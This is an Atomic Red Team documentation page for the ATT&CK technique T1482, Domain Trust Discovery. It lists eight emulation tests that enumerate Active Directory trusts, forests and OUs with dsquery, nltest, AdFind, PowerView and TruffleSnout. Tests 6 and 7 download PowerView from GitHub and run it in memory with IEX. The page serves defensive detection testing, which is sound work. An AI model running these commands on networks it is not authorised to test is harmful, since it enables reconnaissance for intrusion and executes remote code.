Atomic Red Team doc generator
356 lines
11 KiB
Markdown
356 lines
11 KiB
Markdown
# T1482 - Domain Trust Discovery
|
|
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1482)
|
|
<blockquote>
|
|
|
|
Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)
|
|
|
|
</blockquote>
|
|
|
|
## Atomic Tests
|
|
|
|
- [Atomic Test #1 - Windows - Discover domain trusts with dsquery](#atomic-test-1---windows---discover-domain-trusts-with-dsquery)
|
|
|
|
- [Atomic Test #2 - Windows - Discover domain trusts with nltest](#atomic-test-2---windows---discover-domain-trusts-with-nltest)
|
|
|
|
- [Atomic Test #3 - Powershell enumerate domains and forests](#atomic-test-3---powershell-enumerate-domains-and-forests)
|
|
|
|
- [Atomic Test #4 - Adfind - Enumerate Active Directory OUs](#atomic-test-4---adfind---enumerate-active-directory-ous)
|
|
|
|
- [Atomic Test #5 - Adfind - Enumerate Active Directory Trusts](#atomic-test-5---adfind---enumerate-active-directory-trusts)
|
|
|
|
- [Atomic Test #6 - Get-DomainTrust with PowerView](#atomic-test-6---get-domaintrust-with-powerview)
|
|
|
|
- [Atomic Test #7 - Get-ForestTrust with PowerView](#atomic-test-7---get-foresttrust-with-powerview)
|
|
|
|
- [Atomic Test #8 - TruffleSnout - Listing AD Infrastructure](#atomic-test-8---trufflesnout---listing-ad-infrastructure)
|
|
|
|
|
|
<br/>
|
|
|
|
## Atomic Test #1 - Windows - Discover domain trusts with dsquery
|
|
Uses the dsquery command to discover domain trusts.
|
|
Requires the installation of dsquery via Windows RSAT or the Windows Server AD DS role.
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
**auto_generated_guid:** 4700a710-c821-4e17-a3ec-9e4c81d6845f
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#### Attack Commands: Run with `command_prompt`!
|
|
|
|
|
|
```cmd
|
|
dsquery * -filter "(objectClass=trustedDomain)" -attr *
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #2 - Windows - Discover domain trusts with nltest
|
|
Uses the nltest command to discover domain trusts.
|
|
Requires the installation of nltest via Windows RSAT or the Windows Server AD DS role.
|
|
This technique has been used by the Trickbot malware family.
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
**auto_generated_guid:** 2e22641d-0498-48d2-b9ff-c71e496ccdbe
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#### Attack Commands: Run with `command_prompt`!
|
|
|
|
|
|
```cmd
|
|
nltest /domain_trusts
|
|
nltest /trusted_domains
|
|
```
|
|
|
|
|
|
|
|
|
|
#### Dependencies: Run with `command_prompt`!
|
|
##### Description: nltest.exe from RSAT must be present on disk
|
|
##### Check Prereq Commands:
|
|
```cmd
|
|
WHERE nltest.exe >NUL 2>&1
|
|
```
|
|
##### Get Prereq Commands:
|
|
```cmd
|
|
echo Sorry RSAT must be installed manually
|
|
```
|
|
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #3 - Powershell enumerate domains and forests
|
|
Use powershell to enumerate AD information.
|
|
Requires the installation of PowerShell AD admin cmdlets via Windows RSAT or the Windows Server AD DS role.
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
**auto_generated_guid:** c58fbc62-8a62-489e-8f2d-3565d7d96f30
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#### Attack Commands: Run with `powershell`!
|
|
|
|
|
|
```powershell
|
|
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1"
|
|
Get-NetDomainTrust
|
|
Get-NetForestTrust
|
|
Get-ADDomain
|
|
Get-ADGroupMember Administrators -Recursive
|
|
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
|
|
```
|
|
|
|
|
|
|
|
|
|
#### Dependencies: Run with `powershell`!
|
|
##### Description: PowerView PowerShell script must exist on disk
|
|
##### Check Prereq Commands:
|
|
```powershell
|
|
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1") {exit 0} else {exit 1}
|
|
```
|
|
##### Get Prereq Commands:
|
|
```powershell
|
|
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
|
Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerView.ps1"
|
|
```
|
|
##### Description: RSAT PowerShell AD admin cmdlets must be installed
|
|
##### Check Prereq Commands:
|
|
```powershell
|
|
if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 }
|
|
```
|
|
##### Get Prereq Commands:
|
|
```powershell
|
|
Write-Host "Sorry RSAT must be installed manually"
|
|
```
|
|
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #4 - Adfind - Enumerate Active Directory OUs
|
|
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory OUs
|
|
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
**auto_generated_guid:** d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec
|
|
|
|
|
|
|
|
|
|
|
|
#### Inputs:
|
|
| Name | Description | Type | Default Value |
|
|
|------|-------------|------|---------------|
|
|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |
|
|
|
|
|
|
#### Attack Commands: Run with `command_prompt`!
|
|
|
|
|
|
```cmd
|
|
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=organizationalUnit) #{optional_args}
|
|
```
|
|
|
|
|
|
|
|
|
|
#### Dependencies: Run with `powershell`!
|
|
##### Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
|
|
##### Check Prereq Commands:
|
|
```powershell
|
|
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
|
|
```
|
|
##### Get Prereq Commands:
|
|
```powershell
|
|
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
|
|
```
|
|
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #5 - Adfind - Enumerate Active Directory Trusts
|
|
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Trusts
|
|
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
**auto_generated_guid:** 15fe436d-e771-4ff3-b655-2dca9ba52834
|
|
|
|
|
|
|
|
|
|
|
|
#### Inputs:
|
|
| Name | Description | Type | Default Value |
|
|
|------|-------------|------|---------------|
|
|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |
|
|
|
|
|
|
#### Attack Commands: Run with `command_prompt`!
|
|
|
|
|
|
```cmd
|
|
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -gcb -sc trustdmp
|
|
```
|
|
|
|
|
|
|
|
|
|
#### Dependencies: Run with `powershell`!
|
|
##### Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
|
|
##### Check Prereq Commands:
|
|
```powershell
|
|
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
|
|
```
|
|
##### Get Prereq Commands:
|
|
```powershell
|
|
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
|
|
```
|
|
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #6 - Get-DomainTrust with PowerView
|
|
Utilizing PowerView, run Get-DomainTrust to identify domain trusts. Upon execution, progress and info about trusts within the domain being scanned will be displayed.
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
**auto_generated_guid:** f974894c-5991-4b19-aaf5-7cc2fe298c5d
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#### Attack Commands: Run with `powershell`!
|
|
|
|
|
|
```powershell
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainTrust -Verbose
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #7 - Get-ForestTrust with PowerView
|
|
Utilizing PowerView, run Get-ForestTrust to identify forest trusts. Upon execution, progress and info about forest trusts within the domain being scanned will be displayed.
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
**auto_generated_guid:** 58ed10e8-0738-4651-8408-3a3e9a526279
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#### Attack Commands: Run with `powershell`!
|
|
|
|
|
|
```powershell
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-ForestTrust -Verbose
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<br/>
|
|
<br/>
|
|
|
|
## Atomic Test #8 - TruffleSnout - Listing AD Infrastructure
|
|
Iterative AD discovery toolkit for offensive operators. Situational awareness and targeted low noise enumeration. Preference for OpSec.- https://github.com/dsnezhkov/TruffleSnout
|
|
|
|
**Supported Platforms:** Windows
|
|
|
|
|
|
**auto_generated_guid:** ea1b4f2d-5b82-4006-b64f-f2845608a3bf
|
|
|
|
|
|
|
|
|
|
|
|
#### Inputs:
|
|
| Name | Description | Type | Default Value |
|
|
|------|-------------|------|---------------|
|
|
| trufflesnout_path | Path to the TruffleSnout executable | path | PathToAtomicsFolder\..\ExternalPayloads\TruffleSnout.exe|
|
|
| domain | Domain name to search on | string | %userdomain%|
|
|
|
|
|
|
#### Attack Commands: Run with `command_prompt`!
|
|
|
|
|
|
```cmd
|
|
"#{trufflesnout_path}" forest -n #{domain}
|
|
"#{trufflesnout_path}" domain -n #{domain}
|
|
```
|
|
|
|
|
|
|
|
|
|
#### Dependencies: Run with `powershell`!
|
|
##### Description: TruffleSnout.exe must exist on disk at specified location (#{trufflesnout_path})
|
|
##### Check Prereq Commands:
|
|
```powershell
|
|
if (Test-Path "#{trufflesnout_path}") {exit 0} else {exit 1}
|
|
```
|
|
##### Get Prereq Commands:
|
|
```powershell
|
|
New-Item -ItemType Directory (Split-Path "#{trufflesnout_path}") -Force | Out-Null
|
|
Invoke-WebRequest -Uri "https://github.com/dsnezhkov/TruffleSnout/releases/download/0.5/TruffleSnout.exe" -OutFile "#{trufflesnout_path}"
|
|
```
|
|
|
|
|
|
|
|
|
|
<br/>
|